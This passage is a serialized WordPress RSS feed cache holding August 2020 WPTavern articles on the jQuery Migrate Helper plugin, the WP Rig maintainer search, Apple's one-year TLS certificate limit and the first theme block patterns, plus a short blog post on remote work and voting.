clicking on the old link will generate an admin notice that migrates users to the new location. The notice provides a button to remove the legacy admin menu item.</p>\n\n\n\n<p>Gary Murray, the Product Focus and Lead for WooCommerce, said the team had larger plans beyond the initial marketing hub in the announcement post. Coupons are merely a second stage in the longer-term roadmap. &ldquo;Think automations, campaigns, customer segmentation, coupon management, marketing focused analytics, and reporting,&rdquo; he wrote. While the roadmap for the marketing hub is not public, it will be interesting to see what tools the team adds in future iterations of the plugin.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Aug 2020 21:13:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Enable jQuery Migrate Helper Plugin Passes 10K Active Installs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103537\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:189:\"https://wptavern.com/enable-jquery-migrate-helper-plugin-passes-10k-active-installs?utm_source=rss&utm_medium=rss&utm_campaign=enable-jquery-migrate-helper-plugin-passes-10k-active-installs\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4207:\"<p>In just one week since WordPress 5.5 was released, the <a href=\"https://wordpress.org/plugins/enable-jquery-migrate-helper/\">Enable jQuery Migrate Helper</a> plugin has passed 10,000 active installs, as users look for a fix for broken sites. The plugin was developed by the WordPress Core team to mitigate jQuery-related problems users may face after updating to 5.5. WordPress has removed jQuery Migrate 1.4.1, but many themes and plugins are now broken because they use outdated/deprecated jQuery functions that relied on the script. </p>\n\n\n\n<p>The official support forums are inundated with <a href=\"https://wordpress.org/search/5.5?in=support_forums\">reports of broken sites</a> after updating to 5.5, as most users who don&rsquo;t follow core development are not aware that jQuery Migrate has been deprecated. Because it&rsquo;s related to jQuery, many of the sites have very visible problems or broken functionality that prevents users from doing things like viewing and editing content. Those who are still using the Classic Editor have been particularly <a href=\"https://wordpress.org/support/topic/5-5-classic-editor-text-view-add-media-not-working/\">hardest hit by the 5.5 update</a>, since older plugins that hook into the old editor are more likely to be using deprecated jQuery functions. </p>\n\n\n\n<p>The Enable jQuery Migrate Helper plugin has racked up 34 five-star reviews, as it instantly fixes most users&rsquo; problems:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>&ldquo;After updating to 5.5 my hero slider images disappeared and this plugin fixed the problem immediately.&rdquo;</p><p>&ldquo;After updating to WordPress 5.5 my edit a post page and several other things ended up breaking despite having all plugins and my theme updated. This plugin fixed my issue!&rdquo;</p><p>&ldquo;As a newspaper, not being able to see the content of our posts is a pretty big deal. This fixed it. Thank you.&rdquo;</p></blockquote>\n\n\n\n<p>The plugin gives users time to figure out which themes or plugins are causing the problems and request the authors of those extensions to update them for compatibility with the latest version of WordPress.</p>\n\n\n\n<p>One user, David Halchester, reported a problem with a <a href=\"https://wordpress.org/support/topic/navigation-menu-vanishes/\">vanishing navigation menu</a> to the support forums before discovering the Enable jQuery Migrate Helper plugin. </p>\n\n\n\n<p>&ldquo;Voila,&rdquo; Halchester said in his <a href=\"https://wordpress.org/support/topic/enable-jquery-migrate-helper/\">review</a>. &ldquo;It worked like magic. My beautiful custom page is working again. That said &mdash; if WP does not want to lose customers, it needs to make sure its updates are compatible with older sites.</p>\n\n\n\n<p>&ldquo;Thank you to the people who created this plug-in. I just saved myself about $300 or more in fees to have someone &lsquo;fix&rsquo; it.&rdquo;</p>\n\n\n\n<p>He makes a solid point about the plugin saving users&rsquo; money that might otherwise have gone to developers to fix the problem. For those who discover the plugin as a fix, it only costs them the time and frustration of seeking help from their hosting company or volunteers on the support forums. Others who may not be as persistent will likely have to pay for professional troubleshooting.</p>\n\n\n\n<p>Justin Tadlock published a <a href=\"https://wptavern.com/major-jquery-changes-on-the-way-for-wordpress-5-5-and-beyond\">post</a> last week that outlines WordPress&rsquo; three-stage plan for updating jQuery to the latest version.  The plan outlines how a new version of jQuery Migrate will be added in WordPress 5.6 to help users update from jQuery 1.12.4 to 3.5.1 (or later). The tentative plan is to remove the script once more in WordPress 5.7, which is expected in 2021.</p>\n\n\n\n<p>In the meantime, the Enable jQuery Migrate Helper plugin functions as a temporary bandaid. Looking ahead towards the prospect of opt-in automatic updates for major Core releases, which is expected to land in WordPress 5.6, it will be important to consider how wide-reaching these breaking changes can be along to path to updating jQuery, especially for those hanging back with the Classic Editor plugin. </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Aug 2020 05:11:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Second-Order Effects\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"https://ma.tt/?p=52013\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"https://ma.tt/2020/08/second-order-effects/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1234:\"<p><a href=\"https://www.theatlantic.com/author/derek-thompson/\">Derek Thompson&#8217;s writing for the Atlantic</a> has been some of the most interesting this year. His latest, <a href=\"https://www.theatlantic.com/ideas/archive/2020/08/just-small-shift-remote-work-could-change-everything/614980/\">The Workforce Is About to Change Dramatically</a>, is worth a close read. He gives good arguments for and against how remote working will change real estate, entrepreneurship, and something I&#8217;ve been meaning to write about but he did a much better job, how the <a href=\"https://www.theatlantic.com/ideas/archive/2019/09/american-migration-patterns-should-terrify-gop/598153/\">great migration happening away from superstar cities could reshape politics</a>. </p>\n\n\n\n<p>I sincerely hope that all the people <a href=\"https://www.usa.gov/change-voter-registration\">moving to new places are registering to vote in their new home</a>, as I did when I moved from San Francisco back to Houston in 2011. The following year was 2012 and in Harris County (Houston) with 4.263 million people, Obama <a href=\"https://www.politico.com/2012-election/results/president/texas/\">won</a> by <strong>585 votes</strong>. I was one of those votes.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Aug 2020 21:15:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: WP Rig Starter Theme Project Looking for New Maintainers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103406\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:177:\"https://wptavern.com/wp-rig-starter-theme-project-looking-for-new-maintainers?utm_source=rss&utm_medium=rss&utm_campaign=wp-rig-starter-theme-project-looking-for-new-maintainers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9640:\"<img />\n\n\n\n<p class=\"has-drop-cap\">A couple of years ago, Morten Rand-Hendriksen launched <a href=\"https://wptavern.com/wp-rig-a-wordpress-starter-theme-and-build-process-in-one\">WP Rig for WordPress</a>. The goal was to bring a modern <a href=\"https://wprig.io/\">starter theme and build process</a> to the theme development community. Now, he and the current team are hoping to find someone new to keep the project moving. Whoever is chosen will gain outright ownership of the project.</p>\n\n\n\n<p>Rand-Hendriksen will be hosting a <a href=\"https://linkedin.zoom.us/meeting/register/tJ0rc-mhqj4rGtbwM7UB7NL7_bOY50qkMIJ9\">Zoom meeting</a> on Friday, August 21 at 8 am PST. The meeting is planned to last 30 minutes with a possible additional 30 minutes for a Q&amp;A session. He will update the <a href=\"https://wprig.io/news/\">WP Rig blog</a> with the format and agenda for the meeting this week. Anyone interested in WP Rig&rsquo;s future is free to attend.</p>\n\n\n\n<p>&ldquo;The ideal candidate is someone who has the interest, time, and drive to keep the project going,&rdquo; said Rand-Hendriksen. &ldquo;Future owners, maintainers, peers, etc. will be expected to adhere to the established <a href=\"https://github.com/wprig/docs/blob/master/GOVERNANCE.md\">governance model</a>, which outlines roles, responsibilities, powers, and how to &lsquo;climb the ladder&rsquo; if you will.&rdquo;</p>\n\n\n\n<p>Before taking the reins, candidates will meet with Rand-Hendriksen and other legacy maintainers of the project. The goal is to sort out the logistics of the handover.</p>\n\n\n\n<p>&ldquo;Once the project is handed over to new owners and maintainers, the project becomes their project,&rdquo; said Rand-Hendriksen. &ldquo;That means they can take it in whatever direction they feel is meaningful and valuable for the community. This is a true handover: we, the legacy maintainers, are not imposing our view of what WP Rig should be in the future onto the new owners and maintainers. We will impart our knowledge and vision, and let the next generation of the WP Rig team lay down their own path into the future.&rdquo;</p>\n\n\n\n<p>Ideally, the official WordPress Themes Team would take on the WP Rig project or at least its own version of a starter theme. However, the team lacks the resources to make it happen. Some members are interested but no one has the time to contribute to it at the moment, according to Themes Team representative William Patton.</p>\n\n\n\n<p>&ldquo;If the TRT wants to adopt the project, they take precedence over all other interested parties,&rdquo; said Rand-Hendriksen. &ldquo;The intent of WP Rig was always to donate the project to the larger WordPress Open Source project, and the TRT would be the ideal group to hand the keys to.&rdquo;</p>\n\n\n\n<h2>The Unexplored Future of Full-Site Editing</h2>\n\n\n\n<p class=\"has-drop-cap\">Whoever takes on the WP Rig project will be in a position to explore the great unknown of full-site editing. An early version of the feature is expected to land in WordPress 5.6 later this year. This could mean overhauling the project and taking it in an entirely new direction than originally envisioned. It is a tall order and will require someone with the time and ability to keep up with drastic changes in the coming months.</p>\n\n\n\n<p>Rand-Hendriksen and the team did some experimental work with <a href=\"https://github.com/wprig/block-areas\">Block Areas</a> and <a href=\"https://github.com/wprig/wprig-blockade\">WP Rig Blockade</a>, a variant of the original WP Rig theme that explored blocks outside of the content area. However, the repositories have seen little work in the last year and a half. Rand-Hendriksen said they got too caught up in releasing version 2.0 of WP Rig to see either of those projects come to fruition.</p>\n\n\n\n<p>&ldquo;As the WordPress community starts exploring what <em>blocks everywhere</em> means, it is more important than ever to have this unifying base to start from so everyone is talking the same language and using the same tools,&rdquo; he said. &ldquo;When I had to step away, this was my deepest regret: that I wouldn&rsquo;t be part of shaping this next evolution of the platform and wouldn&rsquo;t be able to help the community develop this unifying baseline.&rdquo;</p>\n\n\n\n<p>Rand-Hendriksen believes that full-site editing will only be successful with buy-in from the existing theme development community. Without active participation from these developers, full-site editing could split the community into traditional vs. modern theming.</p>\n\n\n\n<p>&ldquo;There is a lot of money at stake, and a lot of developers deeply invested in and financially dependent on the status quo of themes,&rdquo; he said. &ldquo;To bring them on board and explore the future of themes, there needs to be a unified baseline to start from, and this is the opportune time to introduce modern code, tools, and standards. WP Rig can be a catalyst for this project and can also be the foundation on which such a project is built. What is it open source evangelists always say? &lsquo;Decisions are made by those who show up.&rsquo; This is a chance to not just show up but actively guide the community into a collaborative future.&rdquo;</p>\n\n\n\n<p>He feels like WP Rig&rsquo;s new owners will be in a position to answer one of the questions looming over the WordPress project: <em>What should full-site editing look like?</em></p>\n\n\n\n<h2>Modern Tooling</h2>\n\n\n\n<p class=\"has-drop-cap\">WP Rig is far more advanced than the starter themes of yesteryear. However, it is not alone. Of the many starter themes available throughout the WordPress development community, many of them have moved on to include modern build systems and tooling that were not a part of earlier projects such as <a href=\"https://underscores.me/\">Underscores</a> (_s), which is the closest thing to an &ldquo;official&rdquo; starter theme project WordPress has ever seen.</p>\n\n\n\n<p>&ldquo;When I first came up with the idea of WP Rig, it was because I&rsquo;d been maintaining a very popular LinkedIn Learning (formerly Lynda.com) course on building themes from scratch using _s for years, and I noticed _s and WP themes, in general, were lagging further and further behind the general trends of web development,&rdquo; said Rand-Hendriksen. &ldquo;WordPress themes are by and large still built as if it&rsquo;s 2012, not 2020, and many of the most important advances of the web dev space are not generally in use in theme development. As the project evolved from my personal experiment to a team, we made a decision to start from scratch and say &lsquo;if someone were to build a theme today, in 2018, with today&rsquo;s tools and best practices, what would that look like?&rsquo; The result is a theme building tool using modern build processes and tooling to make theme development easier. Yes, it looks nothing like the standard starter themes, but like I said, the standard starter themes look like the web in 2012.&rdquo;</p>\n\n\n\n<p>There is still some sentiment within the WordPress community that web development is shifting too far from its roots of understanding the basics of HTML, CSS, and entry-level PHP. Have we moved past the point where those simple foundations were enough to build WordPress themes in the modern world?</p>\n\n\n\n<p>&ldquo;Is this harder to understand for beginners?&rdquo; asked Rand-Hendriksen. &ldquo;If you start from the assumption that anything other than the good old way of building themes is &lsquo;harder,&rsquo; then yes, absolutely. If you start from the perspective of WordPress themes being many people&rsquo;s first hands-on experience with web development, and WordPress having a responsibility to introduce people to current and forward-thinking web tooling, then I think the answer is no.&rdquo;</p>\n\n\n\n<p>Rand-Hendriksen says that WP Rig makes many parts of modern theme development much easier and that the more complex pieces are extensively documented. From performance improvements to modern JavaScript to object-oriented PHP, the theme covers a wide range of practices that old-hat theme developers may need to start coming to grips with, sooner rather than later. &ldquo;For most standard theme development, WP Rig is as easy as with any other dev tool,&rdquo; he said. &ldquo;It is just different from how WordPress themes normally do things. Which from my perspective is not only good but necessary if WordPress themes want to stay current with the rest of the web.&rdquo;</p>\n\n\n\n<p>WP Rig also gives theme authors a leg up with accessibility out of the box. Rand-Hendriksen has long been a vocal supporter of pushing for accessibility standards in themes, so it makes sense that the starter that he spearheaded approaches development with accessibility at the forefront.</p>\n\n\n\n<p>&ldquo;I&rsquo;ve developed themes for 15+ years and taught theme development for over a decade,&rdquo; said Rand-Hendriksen. &ldquo;One of the major roadblocks for theme development is the lack of an official unified tool to start from. _s served that role for a while, but it is now poorly maintained, sluggish in development, and lagging significantly behind where standards and modern tooling is concerned. WordPress needs something similar to <a href=\"https://reactjs.org/docs/create-a-new-react-app.html\">&lsquo;create react app&rsquo;</a>  has had for a long time. WP Rig was created to serve as a base, or as inspiration, for such a project: provide an official starting theme and build process to give people a unified place to work from and a unified base to contribute back to and improve so the community can lift itself up together.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Aug 2020 19:43:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:128:\"WPTavern: Apple to Enforce 1-Year Limit on SSL/TLS Certificate Lifetimes on September 1, 2020, Mozilla and Google to Follow Suit\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103455\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:297:\"https://wptavern.com/apple-to-enforce-1-year-limit-on-ssl-tls-certificate-lifetimes-on-september-1-2020-mozilla-and-google-to-follow-suit?utm_source=rss&utm_medium=rss&utm_campaign=apple-to-enforce-1-year-limit-on-ssl-tls-certificate-lifetimes-on-september-1-2020-mozilla-and-google-to-follow-suit\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4866:\"<img />image credit: &nbsp;<a href=\"https://stocksnap.io/author/134\">Sylwia Bartyzel</a>\n\n\n\n<p>Beginning September 1, 2020, Apple&rsquo;s Safari browser will no longer trust SSL/TLS certificates issued for longer than 398 days, which is the equivalent of one year plus the renewal grace period. Apple cited its &ldquo;ongoing efforts to improve web security&rdquo; in the <a href=\"https://support.apple.com/en-us/HT211025\">announcement</a> earlier this year. The change affects the full lineup of Apple platforms: </p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>This change will affect only TLS server certificates issued from the Root CAs preinstalled with iOS, iPadOS, macOS, watchOS, and tvOS. Additionally, this change will affect only TLS server certificates issued on or after September 1, 2020; any certificates issued prior to that date will not be affected by this change.</p></blockquote>\n\n\n\n<p>Apple will begin enforcing the change immediately, which means it will deny connections to TLS servers that don&rsquo;t meet the new requirements. After Apple&rsquo;s announcement, both <a href=\"https://chromium.googlesource.com/chromium/src/+/ae4d6809912f8171b23f6aa43c6a4e8e627de784\">Google</a> and <a href=\"https://github.com/mozilla/pkipolicy/issues/204\">Mozilla</a> contributors moved to propose their own implementations that cap certificate validity at 398 days. </p>\n\n\n\n<p>All of the major certificate authorities are falling in line, changing their offerings to conform with the new one year limit. This includes CA market leader <a href=\"https://www.identrust.com/sites/default/files/resources/IdenTrust_TLS_%20One_%20Year_%20Max_Validity_June_2020_Communication_0_0.pdf\">IdenTrust</a>, which accounts for roughly <a href=\"https://w3techs.com/technologies/history_overview/ssl_certificate\">52%</a> of SSL certificates. DigiCert, a CA that captures 20% of the market, <a href=\"https://www.digicert.com/blog/position-on-1-year-certificates/\">published</a> a dry note of compliance, emphasizing the burden it places on certificate users:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Why did Apple unilaterally decide to enforce a shorter certificate lifetime? Their spokesperson said it was to &ldquo;protect users.&rdquo; We know from prior CA/B Forum discussions that longer certificate lifetimes proved to be challenging in replacing certificates, in the case of a major security incident. Apple clearly wants to avoid an ecosystem that cannot quickly respond to major certificate-related threats. Short-lived certificates improve security because they reduce the window of exposure if a TLS certificate is compromised. They also help remediate normal operational churn within organizations by ensuring yearly updates to identity such as company names, addresses and active domains. As with any improvement, shortening of lifetimes should be balanced against the hardship required of certificate users to implement these changes.</p></blockquote>\n\n\n\n<p>The idea behind the change is that certificates with shorter life cycles are more secure, as compromised keys would expire on shorter timeframes. The new one-year expiration forces hosts and certificate providers to make automation a high priority. In fact, this is one of the reasons Let&rsquo;s Encrypt&rsquo;s free certificates already have a short <a href=\"https://letsencrypt.org/2015/11/09/why-90-days.html\">90-day life cycle</a>. It was put in place years ago to encourage automation so that shorter lifetimes are no less convenient than longer ones.</p>\n\n\n\n<p>Let&rsquo;s Encrypt recommends subscribers renew every sixty days and may even consider recommending shorter lifetimes once automated renewal tools are more widely adopted. This may be happening sooner than anticipated now that Apple&rsquo;s policy is forcing change across the industry.</p>\n\n\n\n<p>Many WordPress users make use of Let&rsquo;s Encrypt certificates using a plugin like <a href=\"https://wordpress.org/plugins/wp-force-ssl/\">WP Force SSL &amp; HTTPS Redirect</a> (100k+ active installs), <a href=\"https://wordpress.org/plugins/ssl-zen/\">SSL Zen</a> (20k+ installs) or <a href=\"https://wordpress.org/plugins/wp-letsencrypt-ssl/\">WP Encryption</a> (20k+ installs). Some plugins have automatic renewal built in, but some offer it as part of a commercial upgrade. Others rely on hosts to perform renewals.</p>\n\n\n\n<p>Although most website owners will not need to take action, the shorter certificate life cycle may can become a hassle without automated certificate management in place. It may also affect client billing with different options available from hosts and certificate authorities. If you manage websites for clients whose sites previously relied on certificates with longer life cycles, you will want to make sure to have some form of automated certificate management set up when the change goes into effect.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 17 Aug 2020 23:08:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"WPTavern: Exploring the First Block Patterns to Land in the WordPress Theme Directory\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=103449\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:215:\"https://wptavern.com/exploring-the-first-block-patterns-to-land-in-the-wordpress-theme-directory?utm_source=rss&utm_medium=rss&utm_campaign=exploring-the-first-block-patterns-to-land-in-the-wordpress-theme-directory\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7623:\"<p class=\"has-drop-cap\">For months, I have eagerly awaited the official release of <a href=\"https://wptavern.com/wordpress-5-5-eckstine-introduces-block-directory-block-patterns-and-automatic-updates-for-themes-and-plugins\">WordPress 5.5</a>, an update that promised to put the long-awaited block patterns system into the hands of theme designers. I may sound like a broken record at this point, but patterns have the potential to <a href=\"https://wptavern.com/block-patterns-will-change-everything\">revolutionize WordPress theme development</a>, even more so than the upcoming full-site editing.</p>\n\n\n\n<p>The feature should drastically change how developers create WordPress themes. If used to its full potential, theme authors can rid themselves of dozens of theme options and drop most of their page templates. They can focus less on programming and more on designing, which is what themes are really all about.</p>\n\n\n\n<p>To understand why patterns are so revolutionary, you must understand the underlying issue that it solves for theme authors and, ultimately, end-users. Throughout all of WordPress&rsquo;s theming history, there has been a single overarching issue that has caused untold numbers of issues. This is an issue that has been the root cause of multiple guidelines added to the WordPress.org theme review system.</p>\n\n\n\n<p>This single issue can almost exclusively trace its roots back to the big question: how can theme authors build custom homepages and easily allow end-users to recreate them?</p>\n\n\n\n<p>Whether it is a slider or columns of info boxes or a call-to-action section, WordPress has never truly provided a solution that theme authors could rely on. To be fair, many developers have built creative and unique systems around the limitations of the platform. However, those systems were specific to a single theme or a set of themes from a single company. There was no standard. There was nothing that would guide theme designers to simply design whatever interesting thing they had in their minds and allow users to simply fill in the content.</p>\n\n\n\n<p>While I say that the homepage of the site is the underlying issue here, the problem is really extended to any page on the site. The homepage design is a bit like the theme author&rsquo;s signature. It allows designers to showcase their talents and draw users in. And for over a decade, theme authors have tried a thousand different methods just to get this one page right.</p>\n\n\n\n<p>Patterns are so much more. The system does not require that theme authors become PHP ninjas to piece together beautiful designs. It does not limit users to a theme options panel for building their homepage &mdash; they can build out any page on their site with the patterns their themes offer.</p>\n\n\n\n<p>The big thing is that it renders the &ldquo;how do I build a custom homepage&rdquo; question moot. Theme authors never need to think about that question again, at least not in the way that they have in previous years. Theming is moving away from building designs on a page level and toward designing individual blocks and sections (patterns). The focus is much more <em>atomic</em>, which provides users with more flexibility and freedom.</p>\n\n\n\n<p>Because I could not wait for weeks or months longer to see what theme authors built within this system, I wanted to take a peek at what the current themes in the official theme directory were doing. There was not a lot to look at, but at least some theme authors are willing to be the pioneers in this new era of theming.</p>\n\n\n\n<p>Currently, the <a href=\"https://wordpress.org/themes/tags/block-patterns/\">Block Editor Patterns</a> feature filter for the directory is not working. Technically, theme authors are not allowed to add the <code>block-patterns</code> tag to their themes, but there is a <a href=\"https://github.com/WordPress/theme-check/pull/272\">patch available</a> which should fix the issue soon.</p>\n\n\n\n<h2>Patterns So Far</h2>\n\n\n\n<p class=\"has-drop-cap\">Right now, the theme directory only has three themes with block patterns. It is not much to go on, but it is interesting to see what theme authors are building so far.</p>\n\n\n\n<p>UXL Themes recently updated its <a href=\"https://wordpress.org/themes/cordero/\">Cordero</a> theme with several blocks. One of the things I like about how Cordero added its patterns is that it created a custom &ldquo;Cordero&rdquo; block pattern category. Patterns can exist in multiple categories, but having all of the theme&rsquo;s custom patterns consolidated to a single group made discovering them much easier. This is a practice that I would like to see more of going forward.</p>\n\n\n\n<p>Cordero&rsquo;s patterns are primarily geared toward the typical business layout. It includes a couple of hero-type patterns, some features/services boxes, and pricing tables.</p>\n\n\n\n<ul><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li></ul>Cordero theme block patterns.\n\n\n\n<p>The <a href=\"https://wordpress.org/themes/inclusive/\">Inclusive</a> theme by Themes Team representative Carolina Nymark has several patterns (it is also a solid theme if you&rsquo;re in the market for a good accessibility-ready option). The most interesting patterns of this theme are its two-column patterns with <em>sidebars</em>. Nymark has essentially created the &ldquo;body&rdquo; of a page with patterns. 